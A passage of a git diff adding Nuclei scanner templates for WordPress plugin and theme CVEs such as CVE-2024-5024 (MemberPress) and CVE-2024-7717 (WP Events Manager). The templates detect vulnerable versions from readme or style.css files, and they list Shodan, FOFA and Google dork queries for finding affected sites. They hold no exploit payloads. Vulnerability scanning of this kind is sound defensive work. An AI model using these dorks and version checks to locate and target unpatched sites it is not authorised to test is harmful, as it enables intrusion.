present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a7c31409-c84a-4197-b08c-b70df5e66a80?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-2694 + metadata: + fofa-query: "wp-content/themes/betheme/" + google-query: inurl:"/wp-content/themes/betheme/" + shodan-query: 'vuln:CVE-2024-2694' + tags: cve,wordpress,wp-theme,betheme,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/betheme/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "betheme" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 27.5.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3886-5b264146b1ead99350dd9d50b9b165a5.yaml b/poc/cve/CVE-2024-3886-5b264146b1ead99350dd9d50b9b165a5.yaml new file mode 100644 index 0000000000..0ccc116688 --- /dev/null +++ b/poc/cve/CVE-2024-3886-5b264146b1ead99350dd9d50b9b165a5.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-3886-5b264146b1ead99350dd9d50b9b165a5 + +info: + name: > + tagDiv Composer <= 5.0 - Reflected Cross-Site Scripting via envato_code[] + author: topscoder + severity: medium + description: > + The tagDiv Composer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘envato_code[]’ parameter in all versions up to, and including, 5.0 due to insufficient input sanitization and output escaping within the on_ajax_check_envato_code function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ed9db9c1-c6b5-459e-9820-ec4ee47b244e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-3886 + metadata: + fofa-query: "wp-content/plugins/td-composer/" + google-query: inurl:"/wp-content/plugins/td-composer/" + shodan-query: 'vuln:CVE-2024-3886' + tags: cve,wordpress,wp-plugin,td-composer,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/td-composer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "td-composer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3998.yaml b/poc/cve/CVE-2024-3998.yaml new file mode 100644 index 0000000000..4be5290157 --- /dev/null +++ b/poc/cve/CVE-2024-3998.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-3998 + +info: + name: > + Betheme | Responsive Multipurpose WordPress & WooCommerce Theme <= 27.5.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode + author: topscoder + severity: low + description: > + The Betheme theme for WordPress is vulnerable to Stored Cross-Site Scripting via several of the plugin's shortcodes in all versions up to, and including, 27.5.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b655b04-1f2f-4745-8237-7ef3f8e31ace?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-3998 + metadata: + fofa-query: "wp-content/themes/betheme/" + google-query: inurl:"/wp-content/themes/betheme/" + shodan-query: 'vuln:CVE-2024-3998' + tags: cve,wordpress,wp-theme,betheme,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/betheme/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "betheme" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 27.5.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43212-b599c8548f771f0451cdc13214f7ff68.yaml b/poc/cve/CVE-2024-43212-b599c8548f771f0451cdc13214f7ff68.yaml new file mode 100644 index 0000000000..df69cc097a --- /dev/null +++ b/poc/cve/CVE-2024-43212-b599c8548f771f0451cdc13214f7ff68.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43212-b599c8548f771f0451cdc13214f7ff68 + +info: + name: > + WpTravelly <= 1.7.7 - Missing Authorization + author: topscoder + severity: high + description: > + The WordPress Tour & Travel Booking Plugin for WooCommerce – WpTravelly plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the ttbm_trash_post() function in all versions up to, and including, 1.7.7. This makes it possible for unauthenticated attackers to trash posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/83a3ed21-bfef-4aef-a32d-5af5be23a067?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43212 + metadata: + fofa-query: "wp-content/plugins/tour-booking-manager/" + google-query: inurl:"/wp-content/plugins/tour-booking-manager/" + shodan-query: 'vuln:CVE-2024-43212' + tags: cve,wordpress,wp-plugin,tour-booking-manager,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tour-booking-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tour-booking-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43254-ab3e4aac5098aa3c00587af765319448.yaml b/poc/cve/CVE-2024-43254-ab3e4aac5098aa3c00587af765319448.yaml new file mode 100644 index 0000000000..0c67e5b2fd --- /dev/null +++ b/poc/cve/CVE-2024-43254-ab3e4aac5098aa3c00587af765319448.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43254-ab3e4aac5098aa3c00587af765319448 + +info: + name: > + Smart Online Order for Clover <= 1.5.6 - Missing Authorization + author: topscoder + severity: low + description: > + The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/34d990b6-3021-45d4-9ecd-cfabb7fbc96c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43254 + metadata: + fofa-query: "wp-content/plugins/clover-online-orders/" + google-query: inurl:"/wp-content/plugins/clover-online-orders/" + shodan-query: 'vuln:CVE-2024-43254' + tags: cve,wordpress,wp-plugin,clover-online-orders,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clover-online-orders" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4401.yaml b/poc/cve/CVE-2024-4401.yaml new file mode 100644 index 0000000000..1b4eb70899 --- /dev/null +++ b/poc/cve/CVE-2024-4401.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-4401 + +info: + name: > + Elementor Addon Elements <= 1.13.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via id and eae_slider_animation Parameters + author: topscoder + severity: low + description: > + The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘id’ and 'eae_slider_animation' parameters in all versions up to, and including, 1.13.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ecfc1466-41d2-498b-8210-c67e8550f5b8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-4401 + metadata: + fofa-query: "wp-content/plugins/addon-elements-for-elementor-page-builder/" + google-query: inurl:"/wp-content/plugins/addon-elements-for-elementor-page-builder/" + shodan-query: 'vuln:CVE-2024-4401' + tags: cve,wordpress,wp-plugin,addon-elements-for-elementor-page-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/addon-elements-for-elementor-page-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "addon-elements-for-elementor-page-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.13.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5024.yaml b/poc/cve/CVE-2024-5024.yaml new file mode 100644 index 0000000000..e235ef8048 --- /dev/null +++ b/poc/cve/CVE-2024-5024.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5024 + +info: + name: > + MemberPress <= 1.11.29 - Reflected Cross-Site Scripting via mepr_screenname and mepr_key Parameters + author: topscoder + severity: medium + description: > + The Memberpress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'mepr_screenname' and 'mepr_key' parameter in all versions up to, and including, 1.11.29 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/718d12fe-31e4-4fa1-ba9a-8626df8ddbfe?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-5024 + metadata: + fofa-query: "wp-content/plugins/memberpress/" + google-query: inurl:"/wp-content/plugins/memberpress/" + shodan-query: 'vuln:CVE-2024-5024' + tags: cve,wordpress,wp-plugin,memberpress,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/memberpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "memberpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.11.29') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5061.yaml b/poc/cve/CVE-2024-5061.yaml new file mode 100644 index 0000000000..a424faa119 --- /dev/null +++ b/poc/cve/CVE-2024-5061.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5061 + +info: + name: > + Enfold <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via wrapper_class and class Parameters + author: topscoder + severity: low + description: > + The Enfold - Responsive Multi-Purpose Theme theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘wrapper_class’ and 'class' parameters in all versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/25462492-59d2-44b7-81c3-93ac04a08bcc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5061 + metadata: + fofa-query: "wp-content/themes/enfold/" + google-query: inurl:"/wp-content/themes/enfold/" + shodan-query: 'vuln:CVE-2024-5061' + tags: cve,wordpress,wp-theme,enfold,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/enfold/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "enfold" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.0.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5212-26e8ea237e5eb184a7a3f6926818b07b.yaml b/poc/cve/CVE-2024-5212-26e8ea237e5eb184a7a3f6926818b07b.yaml new file mode 100644 index 0000000000..562616a0bb --- /dev/null +++ b/poc/cve/CVE-2024-5212-26e8ea237e5eb184a7a3f6926818b07b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5212-26e8ea237e5eb184a7a3f6926818b07b + +info: + name: > + tagDiv Composer <= 5.0 - Reflected Cross-Site Scripting via envato_code[] + author: topscoder + severity: medium + description: > + The tagDiv Composer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘envato_code[]’ parameter in all versions up to, and including, 5.0 due to insufficient input sanitization and output escaping within the on_ajax_register_forum_user function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db95415a-5354-498b-8368-58c47d9948de?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-5212 + metadata: + fofa-query: "wp-content/plugins/td-composer/" + google-query: inurl:"/wp-content/plugins/td-composer/" + shodan-query: 'vuln:CVE-2024-5212' + tags: cve,wordpress,wp-plugin,td-composer,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/td-composer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "td-composer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5726-014e0e9e4a215d0587195d5062af61a5.yaml b/poc/cve/CVE-2024-5726-014e0e9e4a215d0587195d5062af61a5.yaml new file mode 100644 index 0000000000..c91cc4fa0e --- /dev/null +++ b/poc/cve/CVE-2024-5726-014e0e9e4a215d0587195d5062af61a5.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5726-014e0e9e4a215d0587195d5062af61a5 + +info: + name: > + Timeline Event History <= 3.1 - Authenticated (Contributor+) PHP Object Injection + author: topscoder + severity: low + description: > + The Timeline Event History plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1 via deserialization of untrusted input 'timelines-data' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/107afaa6-6c0b-43fb-9713-ebc4f1189ea6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-5726 + metadata: + fofa-query: "wp-content/plugins/timeline-event-history/" + google-query: inurl:"/wp-content/plugins/timeline-event-history/" + shodan-query: 'vuln:CVE-2024-5726' + tags: cve,wordpress,wp-plugin,timeline-event-history,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/timeline-event-history/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "timeline-event-history" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5784.yaml b/poc/cve/CVE-2024-5784.yaml new file mode 100644 index 0000000000..01e50ec768 --- /dev/null +++ b/poc/cve/CVE-2024-5784.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5784 + +info: + name: > + Tutor LMS Pro <= 2.7.2 - Missing Authorization to Authenticated (Subscriber+) Insecure Direct Object Reference + author: topscoder + severity: low + description: > + The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized administrative actions execution due to a missing capability checks on multiple functions like treport_quiz_atttempt_delete and tutor_gc_class_action in all versions up to, and including, 2.7.2. This makes it possible for authenticated attackers, with the subscriber-level access and above, to preform an administrative actions on the site, like comments, posts or users deletion, viewing notifications, etc. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/aa5c23ed-7239-40e1-a795-1ae8d4c2d6c8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N + cvss-score: 7.1 + cve-id: CVE-2024-5784 + metadata: + fofa-query: "wp-content/plugins/tutor-pro/" + google-query: inurl:"/wp-content/plugins/tutor-pro/" + shodan-query: 'vuln:CVE-2024-5784' + tags: cve,wordpress,wp-plugin,tutor-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tutor-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tutor-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5879.yaml b/poc/cve/CVE-2024-5879.yaml new file mode 100644 index 0000000000..b7d7182a89 --- /dev/null +++ b/poc/cve/CVE-2024-5879.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5879 + +info: + name: > + HubSpot – CRM, Email Marketing, Live Chat, Forms & Analytics <= 11.1.22 - Authenticated (Contributor+) Stored Cross-Site Scripting via HubSpot Meeting Widget + author: topscoder + severity: low + description: > + The HubSpot – CRM, Email Marketing, Live Chat, Forms & Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' attribute of the HubSpot Meeting Widget in all versions up to, and including, 11.1.22 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ac004fb0-e178-4e9b-9aa3-b14eab43f22d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5879 + metadata: + fofa-query: "wp-content/plugins/leadin/" + google-query: inurl:"/wp-content/plugins/leadin/" + shodan-query: 'vuln:CVE-2024-5879' + tags: cve,wordpress,wp-plugin,leadin,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/leadin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "leadin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 11.1.22') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7122.yaml b/poc/cve/CVE-2024-7122.yaml new file mode 100644 index 0000000000..7b69045b86 --- /dev/null +++ b/poc/cve/CVE-2024-7122.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7122 + +info: + name: > + Elementor Addon Elements <= 1.13.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Widgets + author: topscoder + severity: low + description: > + The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.13.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/668621b0-67ef-44fc-a126-e8c4e372666e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-7122 + metadata: + fofa-query: "wp-content/plugins/addon-elements-for-elementor-page-builder/" + google-query: inurl:"/wp-content/plugins/addon-elements-for-elementor-page-builder/" + shodan-query: 'vuln:CVE-2024-7122' + tags: cve,wordpress,wp-plugin,addon-elements-for-elementor-page-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/addon-elements-for-elementor-page-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "addon-elements-for-elementor-page-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.13.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7435-56bbd99bfe68d581fd709483401a1c1a.yaml b/poc/cve/CVE-2024-7435-56bbd99bfe68d581fd709483401a1c1a.yaml new file mode 100644 index 0000000000..96d346ddf1 --- /dev/null +++ b/poc/cve/CVE-2024-7435-56bbd99bfe68d581fd709483401a1c1a.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7435-56bbd99bfe68d581fd709483401a1c1a + +info: + name: > + Attire <= 2.0.6 - Authenticated (Contributor+) PHP Object Injection + author: topscoder + severity: low + description: > + The Attire theme for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.0.6 via deserialization of untrusted input. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f21cbe18-77e1-4a9a-96a0-74edaef0db3e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7435 + metadata: + fofa-query: "wp-content/themes/attire/" + google-query: inurl:"/wp-content/themes/attire/" + shodan-query: 'vuln:CVE-2024-7435' + tags: cve,wordpress,wp-theme,attire,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/attire/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "attire" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml b/poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml new file mode 100644 index 0000000000..80da29bf49 --- /dev/null +++ b/poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e + +info: + name: > + WP Events Manager <= 2.1.11 - Authenticated (Subscriber+) Time-Based SQL Injection + author: topscoder + severity: low + description: > + The WP Events Manager plugin for WordPress is vulnerable to time-based SQL Injection via the ‘order’ parameter in all versions up to, and including, 2.1.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/88dc08ff-3966-4606-855c-57c25552599e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7717 + metadata: + fofa-query: "wp-content/plugins/wp-events-manager/" + google-query: inurl:"/wp-content/plugins/wp-events-manager/" + shodan-query: 'vuln:CVE-2024-7717' + tags: cve,wordpress,wp-plugin,wp-events-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-events-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-events-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.11') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7858.yaml b/poc/cve/CVE-2024-7858.yaml new file mode 100644 index 0000000000..3ccd201acc --- /dev/null +++ b/poc/cve/CVE-2024-7858.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7858 + +info: + name: > + Media Library Folders <= 8.2.3 - Missing Authorization on Various Functions + author: topscoder + severity: low + description: > + The Media Library Folders plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several AJAX functions in the media-library-plus.php file in all versions up to, and including, 8.2.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform several actions related to managing media files and folder along with controlling settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fcc0fc00-b7d6-429c-9ab3-f08971c48777?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L + cvss-score: 6.3 + cve-id: CVE-2024-7858 + metadata: + fofa-query: "wp-content/plugins/media-library-plus/" + google-query: inurl:"/wp-content/plugins/media-library-plus/" + shodan-query: 'vuln:CVE-2024-7858' + tags: cve,wordpress,wp-plugin,media-library-plus,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/media-library-plus/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "media-library-plus" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8016.yaml b/poc/cve/CVE-2024-8016.yaml new file mode 100644 index 0000000000..68cc74ccf9 --- /dev/null +++ b/poc/cve/CVE-2024-8016.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8016 + +info: + name: > + The Events Calendar Pro <= 7.0.2 - Authenticated (Administrator+) PHP Object Injection to Remote Code Execution + author: topscoder + severity: low + description: > + The Events Calendar Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 7.0.2 via deserialization of untrusted input from the 'filters' parameter in widgets. This makes it possible for authenticated attackers, with administrator-level access and above, to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely. In 